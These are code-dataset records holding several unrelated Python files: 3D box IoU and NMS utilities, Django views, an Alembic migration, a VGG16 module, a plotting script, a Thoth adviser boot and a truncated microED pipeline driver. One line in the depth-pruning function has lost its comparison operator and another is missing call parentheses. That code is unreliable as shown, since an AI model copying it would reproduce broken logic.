ref_polygon.intersection(target_polygon).area\n # multiply bottom overlap and height overlap\n # for 3D IoU\n overlap3d = overlap * h_overlap[i]\n union3d = ref_polygon.area * (max_h_a[0] - min_h_a[0]) + target_polygon.area * (max_h_b[i] - min_h_b[i]) - overlap3d\n iou_3d[i] = overlap3d / union3d\n\n return iou_3d\n\n\ndef get_corners(bboxes):\n # bboxes: x, y, w, l, alpha; N x 5\n corners = ops.zeros((bboxes.shape[0], 4, 2), dtype=ms.float32)\n x, y, w, l = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]\n # compute cos and sin\n cos_alpha = ops.cos(bboxes[:, -1])\n sin_alpha = ops.sin(bboxes[:, -1])\n # front left\n corners[:, 0, 0] = x - w / 2 * cos_alpha - l / 2 * sin_alpha\n corners[:, 0, 1] = y - w / 2 * sin_alpha + l / 2 * cos_alpha\n\n # rear left\n corners[:, 1, 0] = x - w / 2 * cos_alpha + l / 2 * sin_alpha\n corners[:, 1, 1] = y - w / 2 * sin_alpha - l / 2 * cos_alpha\n\n # rear right\n corners[:, 2, 0] = x + w / 2 * cos_alpha + l / 2 * sin_alpha\n corners[:, 2, 1] = y + w / 2 * sin_alpha - l / 2 * cos_alpha\n\n # front right\n corners[:, 3, 0] = x + w / 2 * cos_alpha - l / 2 * sin_alpha\n corners[:, 3, 1] = y + w / 2 * sin_alpha + l / 2 * cos_alpha\n\n return corners\n\n\ndef uncertainty_guided_prune(separate_depths, GRM_uncern, cfg, depth_range=None, initial_use_uncern=True):\n '''\n Description:\n Prune the unresonable depth prediction results calculated by SoftGRM based on uncertainty.\n Input:\n separate_depths: The depths solved by SoftGRM. shape: (val_objs, 20).\n GRM_uncern: The estimated variance of SoftGRM equations. shape: (val_objs, 20).\n cfg: The config object.\n depth_range: The range of reasonable depth. Format: (depth_min, depth_max)\n Output:\n pred_depths: The solved depths. shape: (val_objs,)\n pred_uncerns: The solved uncertainty. shape: (val_objs,)\n '''\n objs_depth_list = []\n objs_uncern_list = []\n sigma_param = cfg.TEST.UNCERTAINTY_GUIDED_PARAM\n for obj_id in range(separate_depths.shape[0]):\n obj_depths = separate_depths[obj_id]\n obj_uncerns = GRM_uncern[obj_id]\n # Filter the depth estimations out of possible range.\n if depth_range != None:\n valid_depth_mask = (obj_depths > depth_range[0]) & (obj_depths < depth_range[1])\n obj_depths = obj_depths[valid_depth_mask]\n obj_uncerns = obj_uncerns[valid_depth_mask]\n # If all objects are filtered.\n if obj_depths.shape[0] == 0:\n objs_depth_list.append(ops.expand_dims(separate_depths[obj_id].mean(),0))\n objs_uncern_list.append(ops.expand_dims(GRM_uncern[obj_id].mean, 0))\n continue\n\n if initial_use_uncern:\n considered_index = obj_uncerns.argmin()\n else:\n considered_index = find_crowd_index(obj_depths)\n\n considered_mask = ops.zeros(obj_depths.shape, dtype=ms.bool_)\n considered_mask[considered_index] = True\n obj_depth_mean = obj_depths[considered_index]\n obj_depth_sigma = ops.sqrt(obj_uncerns[considered_index])\n flag = True\n search_cnt = 0\n while flag == True:\n search_cnt += 1\n flag = False\n new_considered_mask = (obj_depths > obj_depth_mean - sigma_param * obj_depth_sigma) & (\n obj_depths < obj_depth_mean + sigma_param * obj_depth_sigma)\n if considered_mask.equal(new_considered_mask).sum() 20: # No new elements are considered.\n objs_depth_list.append(ops.expand_dims(obj_depth_mean,0))\n objs_uncern_list.append(ops.expand_dims((obj_depth_sigma * obj_depth_sigma),0))\n break\n else:\n considered_mask = new_considered_mask\n considered_depth = obj_depths[considered_mask]\n considered_uncern = obj_uncerns[considered_mask]\n considered_w = 1 / considered_uncern\n considered_w = considered_w / considered_w.sum()\n obj_depth_mean = (considered_w * considered_depth).sum()\n obj_depth_sigma = ops.sqrt((considered_w * considered_uncern).sum())\n flag = True\n\n pred_depths = ops.cat(objs_depth_list, axis=0)\n pred_uncerns = ops.cat(objs_uncern_list, axis=0)\n return pred_depths, pred_uncerns\n\n\ndef find_crowd_index(obj_depths):\n '''\n Description:\n Find the depth at the most crowded index for each objects.\n Input:\n obj_depths: The estimated depths of an object. shape: (num_depth,).\n Output:\n crowd_index: Int.\n '''\n num_depth = obj_depths.shape[0]\n\n depth_matrix = ops.expand_dims(obj_depths,0).expand(num_depth, num_depth)\n cost_matrix = (ops.expand_dims(obj_depths,1) - depth_matrix).abs() # cost_matrix shape: (num_depth, num_depth)\n crowd_index = cost_matrix.sum(axis = 1).argmin()\n return crowd_index\n\n\ndef error_from_uncertainty(uncern):\n '''\n Description:\n Get the error derived from uncertainty.\n Input:\n uncern: uncertainty tensor. shape: (val_objs, 20)\n Output:\n error: The produced error. shape: (val_objs,)\n '''\n if uncern.ndim != 2:\n raise Exception(\"uncern must be a 2-dim tensor.\")\n weights = 1 / uncern\t# weights shape: (total_num_objs, 20)\n weights = weights / ops.sum(weights, dim = 1, keepdim = True)\n error = ops.sum(weights * uncern, dim = 1)\t# error shape: (valid_objs,)\n return error\n\n\ndef nms_3d(results, bboxes, scores, iou_threshold = 0.2):\n '''\n Description:\n Given the 3D bounding boxes of objects and confidence scores, remove the overlapped ones with low confidence.\n Input:\n results: The result tensor for KITTI. shape: (N, 14)\n bboxes: Vertex coordinates of 3D bounding boxes. shape: (N, 8, 3)\n scores: Confidence scores. shape: (N).\n iou_threshold: The IOU threshold for filering overlapped objects. Type: float.\n Output:\n preserved_results: results after NMS.\n '''\n descend_index = ops.flip(ops.argsort(scores, axis = 0), dims = (0,))\n results = results[descend_index, :]\n sorted_bboxes = bboxes[descend_index, :, :]\n\n box_indices = np.arange(0, sorted_bboxes.shape[0])\n suppressed_box_indices = []\n tmp_suppress = []\n\n while len(box_indices) > 0:\n\n if box_indices[0] not in suppressed_box_indices:\n selected_box = box_indices[0]\n tmp_suppress = []\n\n for i in range(len(box_indices)):\n if box_indices[i] != selected_box:\n selected_iou = get_iou_3d(sorted_bboxes[selected_box].squeeze(0), sorted_bboxes[box_indices[i]].squeeze(0))[0]\n if selected_iou > iou_threshold:\n suppressed_box_indices.append(box_indices[i])\n tmp_suppress.append(i)\n\n box_indices = np.delete(box_indices, tmp_suppress, axis=0)\n box_indices = box_indices[1:]\n\n preserved_index = np.setdiff1d(np.arange(0, sorted_bboxes.shape[0]), np.array(suppressed_box_indices), assume_unique=True)\n preserved_results = results[preserved_index.tolist(), :]\n\n return preserved_results\n\n","repo_name":"CPREgroup/MonoDDE_new","sub_path":"model_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20653513614","text":"INPUT_WIDTH = 30\nINPUT_HEIGHT = 30\nN_PLAYERS = 10\nINPUT_CHANNELS = 4 + N_PLAYERS\n'''\nInput channels encoding:\ncell type (one-hot): normal, gold, energy\nbase type (binary): is_base\noccupation status (binary): can_be_attacked\nowner (one-hot): you, enemy_1, enemy_2, ... enemy_10?\nn = 3 + 1 + 10(?) = 15\n'''","repo_name":"evilnose/colorfight_arsenal","sub_path":"dqn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32939313892","text":"from typing import Any, Optional, Type\nfrom django.db.models.query import QuerySet\nfrom django.forms.models import BaseModelForm\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, ListView, UpdateView, CreateView, DetailView\nfrom django.views import View\nfrom movies.forms import MovieCreateUpdateForm\nfrom movies.models import Movie, MultiMovieSet\n\n\nclass HomePageView(TemplateView):\n template_name = \"pages/home.html\"\n\n\nclass AboutPageView(TemplateView):\n template_name = \"pages/about.html\"\n\n\nclass MovieListView(ListView):\n model = Movie\n context_object_name = 'movies'\n\nclass MovieCreateView(CreateView):\n model = Movie\n template_name = 'movies/movie_add.html'\n form_class = MovieCreateUpdateForm\n success_url = '/movies/add'\n\nclass MovieUpdateView(UpdateView):\n model = Movie\n model = Movie\n template_name = 'movies/movie_add.html'\n form_class = MovieCreateUpdateForm\n success_url = '/movies'\n\n\nclass MultiMovieSetCreateView(CreateView):\n model = MultiMovieSet\n fields = ['title', 'movies']\n template_name = 'movies/multi_movie_set_add.html'\n success_url = '/movies/add/multi_movie_set'\n\n def get_form(self, form_class: Type[BaseModelForm] | None = None) -> BaseModelForm:\n form = super().get_form(form_class)\n form.fields['movies'].required = False\n return form","repo_name":"mitch-jensen/movie_database","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8929366575","text":"\"\"\"Create stats table\n\nRevision ID: 0002\nRevises: 0001\nCreate Date: 2018-11-30 17:46:54.067383\n\n\"\"\"\nfrom alembic import op\nfrom sqlalchemy import Column, TEXT, INT, ForeignKey, PrimaryKeyConstraint\n\n\nrevision = '0002'\ndown_revision = '0001'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('stats',\n Column('id', TEXT, ForeignKey('urls.id'), index=True),\n Column('ip', TEXT, nullable=False),\n Column('count', INT, nullable=False, default=0),\n PrimaryKeyConstraint('id', 'ip'))\n\n\ndef downgrade():\n op.drop_table('stats')\n","repo_name":"pgan002/shorturl","sub_path":"alembic/versions/0002_create_stats_table.py","file_name":"0002_create_stats_table.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"932171424","text":"from __future__ import annotations\n\nfrom model.io.load import LoadModel\nfrom model.io.save import SaveModel\n\n\ndef main():\n obj = LoadModel(\"tests/3d/tileEntities/tileEntities.obj\")\n for texture in obj.MaterialLibrary.textureHandler.textures:\n print(texture.name)\n\n SaveModel(obj, \"export/yourMum\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jokil123/mineways-block-entity-generator","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"43223891441","text":"import pandas as pd\nfrom skbio.diversity import beta_diversity\nfrom skbio.stats.ordination import *\nfrom plotnine import *\n\n\ndf_abundance = pd.read_csv('abundance.csv').T\ndf_map = pd.read_csv('mapper.csv')\ndf_map.index = df_map['SampleID']\nEnv = []\n\n\ndf_abundance.columns = df_abundance.iloc[0]\ndf_abundance = df_abundance.drop('samples',axis=0)\n\nfor i in df_abundance.index:\n Env.append(df_map.loc[i, 'Env'])\n\nbc_dm = beta_diversity(\"braycurtis\", df_abundance, df_abundance.index)\nbc_pc = pd.DataFrame(pcoa(bc_dm, number_of_dimensions = 2).samples.values.tolist(),df_abundance.index, columns = ['PC1', 'PC2'])\ndf_abundance['Env'] = Env\nprint(bc_pc)\n\nfig = (ggplot(bc_pc,aes(x = 'PC1', y = 'PC2',color ='Env'))\n + geom_point(size=1)\n + theme(figure_size= (10,10))\n + theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())\n + theme(axis_line = element_line(color=\"gray\", size = 5))\n + theme(legend_key_size = 5)\n + theme(legend_position = (0.9,0.9))\n + stat_ellipse()\n + xlab('PC1')\n + ylab('PC2')\n )\nprint(fig)\n","repo_name":"LudensZhang/EXPERT_8folds_prj2","sub_path":"pcoa_plot.py","file_name":"pcoa_plot.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70793220520","text":"from collections import namedtuple\n\nimport torch\nfrom torchvision import models\n\n\nclass Vgg16(torch.nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg16, self).__init__()\n vgg_pretrained_features = models.vgg16(pretrained=True).features\n self.slice1 = torch.nn.Sequential()\n self.slice2 = torch.nn.Sequential()\n self.slice3 = torch.nn.Sequential()\n self.slice4 = torch.nn.Sequential()\n for x in range(4):\n self.slice1.add_module(str(x), vgg_pretrained_features[x])\n for x in range(4, 9):\n self.slice2.add_module(str(x), vgg_pretrained_features[x])\n for x in range(9, 16):\n self.slice3.add_module(str(x), vgg_pretrained_features[x])\n for x in range(16, 23):\n self.slice4.add_module(str(x), vgg_pretrained_features[x])\n if not requires_grad:\n for param in self.parameters():\n param.requires_grad = False\n\n def forward(self, X):\n h = self.slice1(X)\n h_relu1_2 = h\n h = self.slice2(h)\n h_relu2_2 = h\n h = self.slice3(h)\n h_relu3_3 = h\n h = self.slice4(h)\n h_relu4_3 = h\n vgg_outputs = namedtuple(\"VggOutputs\", ['relu1_2', 'relu2_2', 'relu3_3', 'relu4_3'])\n out = vgg_outputs(h_relu1_2, h_relu2_2, h_relu3_3, h_relu4_3)\n return out\n\n\n# create a module to normalize input image tensors (which have shape B x C x H x W)\nclass Normalization(torch.nn.Module):\n def __init__(self, mean, std):\n super(Normalization, self).__init__()\n # .view the mean and std to make them [C x 1 x 1] so that they can\n # directly work with image Tensor of shape [B x C x H x W].\n # B is batch size. C is number of channels. H is height and W is width.\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n # normalize img\n return (img - self.mean) / self.std","repo_name":"tayfunates/intuitive-physics","sub_path":"models/O2P2/loss/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"70368995560","text":"import sys\nsys.path.insert(0,'/data/')\nimport os\n\nfrom ResolveTools.utils.utils import printwtime\nfrom ResolveTools.segmentation.brainregions import add_region_toadata\n\nresult = sys.argv[1] # results_N21_wmesmer_combined\n\nresultfolder = \"/data/baysor/04_baysor/\"+result\n#roi = sys.argv[2] #\"R2_W0A2\"\n\nrois = os.listdir(resultfolder+\"/rois/\")\n\nfor roi in rois:\n printwtime(roi)\n adatafiles = list(filter(lambda x: \".loom\" in x, os.listdir(resultfolder+\"/rois/\"+roi)))\n for adatafile in adatafiles:\n printwtime(\" \"+adatafile)\n add_region_toadata(resultfolder+\"/rois/\"+roi+\"/\"+adatafile,\n \"/data/confocal/03_annotation/Confocal_\"+roi+\"_annotated_regions.npz\")\n\n\n\n\n","repo_name":"valentinwust/ResolveTools","sub_path":"scripts/baysor/scripts/final_03_add_region.py","file_name":"final_03_add_region.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24324247429","text":"import torch\nimport numpy\nimport random\nfrom udl_vis.Basis.auxiliary import set_random_seed\nprint(torch.__version__) # 1.13.0+cu116\n\nif __name__ == '__main__':\n\n n = 100\n set_random_seed(1)\n\n seed = 1#int(torch.empty((), dtype=torch.int64).random_().item())\n generator = torch.Generator()\n # 不受全局种子限制,设置完后内部仍有种子偏移保证每个epoch都是不同的\n # Function 'torch.Generator()' is not limited by the global seed\n # because there is another seed offset inside it to ensure that each epoch is different\n generator.manual_seed(seed)\n\n def simple_generator():\n # 随着epoch,torch.randperm内部会产生种子偏移,可以通过generator来控制,注意不可以每轮设成一样的\n # When the epoch is increasing, torch.randperm also generates a seed offset inside,\n # which can be controlled by the generator.\n # Note that it cannot be set the same for each epoch\n\n # 仅限于load模型的时候在模型、优化器都载入后,保证数据轮次也是一样的\n # When loading the weights, the model and the optimizer are loaded.\n # Besides, the sampled data in dataloader are guaranteed to be the same.\n # See Line: 36-39\n yield torch.randperm(n, generator=generator).tolist()\n\n\n state = generator.get_state()\n\n for i in range(3):\n my_gen = simple_generator()\n # 使得每轮epoch是一样的,但不要这么做,仅限于恢复模型的时候保证数据轮次是一样的\n # It will be make sure each epoch is the same, but don't do this,\n # only when restoring the model to ensure that the sampled data are the same.\n # It should be considered in https://pytorch.org/docs/stable/notes/randomness.html\n print(generator.set_state(state))\n print(generator.get_state().sum())\n # print(torch.get_rng_state().sum())\n print(next(my_gen))\n\n # 跟实例相关的,不是全局的\n # It is related to the instance, not the global.\n print(torch.Generator().get_state().sum())\n","repo_name":"XiaoXiao-Woo/UDL","sub_path":"udl_vis/tests/test_pytorch_dataloader.py","file_name":"test_pytorch_dataloader.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"6214750387","text":"import logging\nimport os\nfrom typing import Generator\nfrom typing import Dict\nfrom typing import Any\nfrom typing import TYPE_CHECKING\n\nimport attr\nfrom thoth.common import get_justification_link as jl\nfrom thoth.common import OpenShift\n\nfrom ..boot import Boot\nfrom ..exceptions import NotAcceptable\n\nif TYPE_CHECKING:\n from ..pipeline_builder import PipelineBuilderContext\n\n_LOGGER = logging.getLogger(__name__)\n\n\n@attr.s(slots=True)\nclass SolvedSoftwareEnvironmentBoot(Boot):\n \"\"\"A boot to check for solved software environment before running any resolution.\"\"\"\n\n _JUSTIFICATION_LINK = jl(\"solved_sw_env\")\n _THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS = os.getenv(\"THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS\", \"\")\n\n @classmethod\n def should_include(cls, builder_context: \"PipelineBuilderContext\") -> Generator[Dict[str, Any], None, None]:\n \"\"\"Register self, always.\"\"\"\n if builder_context.project.runtime_environment.is_fully_specified() and not builder_context.is_included(cls):\n yield {}\n return None\n\n yield from ()\n return None\n\n def run(self) -> None:\n \"\"\"Check for version clash in packages.\"\"\"\n if self.context.graph.solved_software_environment_exists(\n os_name=self.context.project.runtime_environment.operating_system.name,\n os_version=self.context.project.runtime_environment.operating_system.version,\n python_version=self.context.project.runtime_environment.python_version,\n ):\n return\n\n runtime_environment = self.context.project.runtime_environment\n msg = (\n f\"No observations found for {runtime_environment.operating_system.name!r} in \"\n f\"version {runtime_environment.operating_system.version!r} using \"\n f\"Python {runtime_environment.python_version!r}\"\n )\n\n self.context.stack_info.append(\n {\n \"type\": \"ERROR\",\n \"message\": msg,\n \"link\": self._JUSTIFICATION_LINK,\n }\n )\n\n _LOGGER.warning(\"%s - %s\", msg, self._JUSTIFICATION_LINK)\n _LOGGER.warning(\"Available configurations:\")\n\n configurations = []\n solvers = self._THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS.split()\n for solver in solvers:\n solver = solver.strip()\n if not solver:\n continue\n\n item = OpenShift.parse_python_solver_name(solver)\n configurations.append(item)\n\n if item[\"os_name\"] == \"rhel\":\n # Duplicate entry as we can also guide on the same UBI environment. UBI and RHEL are binary compatible.\n other_item = dict(item)\n other_item[\"os_name\"] = \"ubi\"\n configurations.append(other_item)\n\n _LOGGER.warning(\"{:<16} {:<16} {:<8}\".format(\"OS name\", \"OS version\", \"Python version\"))\n for conf in sorted(\n configurations,\n key=lambda i: (i[\"os_name\"], i[\"os_version\"], i[\"python_version\"]),\n ):\n self.context.stack_info.append(\n {\n \"message\": f\"Consider using {conf['os_name']!r} in version {conf['os_version']!r} \"\n f\"with Python {conf['python_version']}\",\n \"type\": \"ERROR\",\n \"link\": self._JUSTIFICATION_LINK,\n }\n )\n _LOGGER.warning(\"{:<16} {:<16} {:<8}\".format(conf[\"os_name\"], conf[\"os_version\"], conf[\"python_version\"]))\n\n raise NotAcceptable(msg)\n","repo_name":"thoth-station/adviser","sub_path":"thoth/adviser/boots/solved_software_environment.py","file_name":"solved_software_environment.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"18"} +{"seq_id":"74458396200","text":"#!/usr/bin/env python\n\nimport argparse, codecs, glob, os, platform, shutil, subprocess, sys, time\nfrom datetime import datetime\nfrom threading import Thread\n\nif (__name__ == \"__main__\") :\n args = sys.argv[0:]\n \n explain_user_input = '''\n Method 1 (basic, recommended for interactive running)\n Usage: python run_all.py \n Example: python /Users/kimd999/Dropbox/script/python/cryoEM/AutoMicroED/run_all.py mrc_file.list\n \n Method 2 (advanced, recommended for continuous running)\n Usage: python run_all.py \n Example: python /Users/kimd999/Dropbox/script/python/cryoEM/AutoMicroED/run_all.py mrc_file.list args_file.txt\n \n Note\n Exemplar mrc_file.list would have \\n\\t/Users/kimd999/research/microED/2_20190913_162354.mrc\\n\\t/Users/kimd999/research/microED/3_20190913_163300.mrc\n This mrc_fie.list can be generated by for example, kimd999$ ls $PWD/*.mrc > mrc_file.list\n AutoMicroED will use all mrc files in mrc_file.list until it reaches user specified completeness.\n \n If a user provided file as well, then arguments in there will be used automatically rather than waiting for user to enter input values interactively.\n \n Exemplar input files are in AutoMicroED/templates/input_files'''\n if (len(args) < 2):\n print (explain_user_input)\n exit(1)\n \n ''' \n # this version check doesn't work if later sentences do not conform to python3\n if (str(sys.version[:1]) == \"2\"):\n print (\"AutoMicroED is optimized with python3 rather than python2.\\n\\nTherefore, run\")\n print (\"\\talias python='python3'\")\n print (\"and run AutoMicroED again\")\n print (\"\\n\\nAlternatively a user can do\")\n print (\"\\tpython3 /run_all.py \")\n print (\"\\n\\tIf a user wants to use alias, then put -> alias MicroED=\\\"/home/kimd999/bin/miniconda3/bin/python3.8 /gpustorage/automation/MicroED/Scripts/AutoMicroED/run_all.py\\\"\")\n print (\"\\tinto ~/.bashrc (of course, modify PATH to user's own one)\")\n exit(1) \n\n # \"If a user uses pnnl_kriosgpu, \\\n # alias MicroED=\\\"/home/kimd999/bin/miniconda3/bin/python3.8 /gpustorage/automation/MicroED/Scripts/AutoMicroED/run_all.py\\\" works\n '''\n\n if not hasattr(sys, \"version_info\") or sys.version_info < (3,7):\n raise ValueError(\"Script requires Python 3.7 or higher!\")\n\n\n today = datetime.now()\n time_now = today.strftime('%Y/%m/%d') + \"/\" + str(today.hour) + \":\" + str(today.minute) + \":\" + str(today.second)\n \n py_file = args[0]\n list_of_mrc_file_or_smv_folder = args[1]\n list_of_mrc_file_or_smv_folder_w_abs_path = os.path.abspath(list_of_mrc_file_or_smv_folder)\n \n repo_location = os.path.dirname(os.path.abspath(py_file))\n \n util_path = repo_location + \"/util/\"\n sys.path.insert(0, util_path)\n from util import *\n \n args_dict = {} # this should live before args_file_parse\n starting_dir = os.getcwd()\n args_dict['starting_dir'] = starting_dir\n args_dict['repo_location'] = repo_location\n\n\n if (len(args) >= 3):\n args_file = args[2]\n args_file_w_abs_path = os.path.abspath(args_file) \n args_dict['args_file_w_abs_path'] = os.path.abspath(args_file_w_abs_path)\n\n #print (f\"args_dict:{args_dict}\")\n\n if (os.path.isdir(\"output\") == False):\n os.mkdir(\"output\")\n os.chdir(\"output\") \n\n working_folder = today.strftime('%Y%m%d') + \"_\" + str(today.hour) + \"_\" + str(today.minute) + \"_\" + str(today.second)\n \n working_folder_abs_path = os.path.abspath(working_folder)\n \n os.mkdir(working_folder_abs_path)\n os.chdir(working_folder_abs_path)\n \n logfile_name = \"full.log\"\n args_dict['logfile_name_w_abs_path'] = os.path.abspath(logfile_name)\n \n if (os.path.isfile(args_dict['logfile_name_w_abs_path']) == True):\n os.remove(args_dict['logfile_name_w_abs_path'])\n \n args_dict['summary_logfile_name_w_abs_path'] = args_dict['logfile_name_w_abs_path'][:-8] + \"summary.log\"\n\n\n ############### read args file and populate args_dict\n if (len(args) >= 3):\n args_dict_renewed = args_file_parse(args_dict)\n if (args_dict_renewed == False):\n print_this = \"\\nargs_file needs to be updated properly. Please refer (user's AutoMicroED git repo)/templates/args_file/explanation_of_args.txt for more detail.\"\n print_this = print_this + \"\\nAutoMicroED will exit now.\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n else:\n args_dict = args_dict_renewed\n print_this = \"args_dict after population:\" + str(args_dict)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n \n ############### read args file and populate args_dict\n\n\n print_this = \"working_folder_abs_path:\" + str(working_folder_abs_path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n print_this = \"User entered arguments:\" + str(args)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n\n ############### Check existence of elements in input mrc_file_or_smv_folder\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for mrc_file in mrc_file_or_smv_folder_opened:\n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n mrc_w_path = mrc_file.rstrip()\n \n if (os.path.exists(mrc_w_path) == False):\n print_this = str(mrc_w_path) + \" doesn't exist. Please fix file name/path.\\n\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n mrc_file_or_smv_folder_opened.close()\n ############### Check existence of elements in input mrc_file_or_smv_folder\n\n\n ############### Identify whether input mrc_file_or_smv_folder is for mrc/smv\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n input_list_has_mrc = False\n for mrc_file in mrc_file_or_smv_folder_opened:\n if (\".mrc\" in mrc_file):\n input_list_has_mrc = True\n break\n mrc_file_or_smv_folder_opened.close()\n args_dict['input_list_has_mrc'] = input_list_has_mrc\n ############### Identify whether input mrc_file_or_smv_folder is for mrc/smv\n \n\n ############### count columns, NX, NY, sections of the FIRST input mrc \n if (args_dict['input_list_has_mrc'] == True):\n mrc_file_list_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for mrc_file in mrc_file_list_opened:\n if \".mrc\" in mrc_file:\n mrc_w_path = mrc_file.rstrip()\n columns, sections = count_columns_sections_in_each_mrc_file_by_mrcfile(args_dict, mrc_w_path)\n if (columns == None) or (columns == False):\n print_this = \"columns of mrc is either None or False. Is this mrc input file correct?\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n args_dict['columns'] = columns\n args_dict['NX'] = args_dict['columns']\n args_dict['NY'] = args_dict['columns']\n args_dict['sections'] = sections\n break\n else: # user provided .mrcs file\n break\n mrc_file_list_opened.close()\n\n else: # if (args_dict['input_list_has_mrc'] = False # so user's file is smv/img\n pass\n #args_dict['sections'] = 1\n # Doo Nam and Sam believe that smv/img file are for single image never stacks as mrcs\n\n '''\n # check whether a user specified ORGX, ORGY\n if (\"ORGX\" not in args_dict) or (\"ORGY\" not in args_dict):\n ORGX_specified = False\n for key, value in args_dict.items():\n ##print (fkey:{key}\")\n ##print (flen(key):{len(key)}\")\n if (len(key) == 2):\n if (\"ORGX\" in key[0]):\n ORGX_specified = True\n break\n if (ORGX_specified == False):\n print_this = \"ORGX and ORGY should be specified manually when a user provides smv only (not mrc).\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n # check whether a user specified ORGX, ORGY\n '''\n ############### count columns, NX, NY, sections of the FIRST input mrc\n\n\n\n ############### check xds_par, xscale, xdsconv path\n try:\n path = subprocess.check_output([\"which\", \"xds_par\"]).decode('UTF-8')\n print_this = \"xds_par is located by PATH. The path of xds_par:\" + str(path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n except:\n print_this =\"AutoMicroED can't find xds_par in user's PATH.\"\n print_this = print_this + \"\\nPlease add xds_par folder to PATH and run AutoMicroED again because same PATH has forkxds as well.\"\n # devel comment: because of forkxds, do not use xds_folder argument, mandate users to set PATH\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n write_this = '''For example,\n emacs ~/.bash_profile\n \n (copy and paste this to any line)\n export PATH=\"/gpustorage/DN/XDS-INTEL64_Linux_x86_64\":$PATH \n \n (save, for mac keyboard Ctrl-x-s)\n \n (exit emacs, for mac keyboard Ctrl-x-c)\n \n source ~/.bash_profile (or opening a new tab to take effect of new change in ~/.bash_profile'''\n\n #export PATH=\"/gpustorage/DN/XDS-INTEL64_Linux_x86_64\":$PATH # for PNNL_Krios_GPU.\n #export PATH=\"/home/kimd999/bin/XDS-INTEL64_Linux_x86_64\":$PATH # for PNNL_HPC_Cascade.\n\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n ################ check xds_par, xscale, xdsconv path\n \n \n \n ################ check cad, f2mtz, shelxt, shelxl path\n try:\n subprocess.check_output([\"which\", \"shelxt\"])\n except:\n if ('ccp4_folder' not in args_dict.keys()):\n print_this =\"AutoMicroED can't find shelxt in user's PATH.\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n print_this =\"Solution #1. Add shelxt folder to ~/.bashrc PATH and run AutoMicroED again. \\n\"\n print_this = print_this + '''For example,\n emacs ~/.bash_profile\n \n (copy and paste this to any line)\n export PATH=\"/home/kimd999/bin/ccp4/ccp4-7.1/bin\":$PATH \n \n (save by Ctrl-x-s for mac keyboard)\n (exit emacs by Ctrl-x-c for mac keyboard)\n \n source ~/.bash_profile (or opening a new tab to take effect of new change in ~/.bash_profile'''\n\n #export PATH=\"/home/kimd999/bin/ccp4/ccp4-7.1/bin\":$PATH # for PNNL_Krios_GPU.\n #export PATH=\"/msc/krios/bin\":$PATH # for PNNL_HPC_cascade.\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n \n print_this =\"Solution #2. Add ccp4_folder (that has cad, f2mtz, shelxt, shelxl) to user's args_file and run AutoMicroED again. \\n\"\n print_this = print_this + '''For example,\n emacs args_file.txt\n \n (copy and paste this to any line)\n ccp4_folder 